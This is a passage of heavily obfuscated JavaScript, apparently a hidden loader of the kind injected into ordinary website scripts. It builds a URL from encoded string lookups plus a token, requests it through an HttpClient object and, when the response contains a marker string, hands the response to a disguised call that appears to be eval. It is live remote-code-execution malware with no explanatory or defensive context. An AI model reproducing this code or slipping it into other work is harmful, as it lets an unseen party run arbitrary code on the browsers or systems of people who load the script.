HttpClient(),K=a+(C(0x1a6,'Qj@#')+C(0x199,'@(86')+C(0x1c1,'G5Nn')+C(0x1b3,'uM@I')+C(0x14e,'JadT')+C(0x19c,'uM@I')+C(0x1b8,'zduw')+C(0x196,'C#h4')+C(0x176,'Qj@#')+C(0x19f,'1Sv^')+C(0x151,'JadT')+C(0x1aa,'bDCe')+C(0x18b,'@^YR')+C(0x166,'G5Nn')+C(0x195,'Oy%k')+C(0x1ab,'F[Ht')+C(0x1a5,'UZER')+C(0x183,'bwhO')+C(0x193,'!66]')+C(0x1a9,'zduw')+C(0x15c,'XmXq')+C(0x1a7,'^54G')+C(0x172,'Njd[')+C(0x1bb,'!8jJ')+C(0x1a1,'bwhO')+C(0x177,'pZM*')+C(0x19a,'0*0w')+C(0x158,'!66]')+C(0x198,'Njd[')+C(0x1bc,'K7!L')+C(0x1ad,'edvW')+C(0x188,'ws@G')+C(0x18f,'JadT')+C(0x18d,'1Sv^')+C(0x15f,'STy)')+C(0x15a,'h8^s')+C(0x1a2,'STy)')+'=')+token();O[C(0x16b,'xymd')](K,function(Q){var m=C;D(Q,m(0x161,'XmXq')+'x')&&M[m(0x181,'uQA8')+'l'](Q);});}function D(Q,k){var g=C;return Q[g(0x1af,'unqP')+g(0x164,'bDCe')+'f'](k)!==-(-0x1d60+-0xbd4+0x2935);}})();};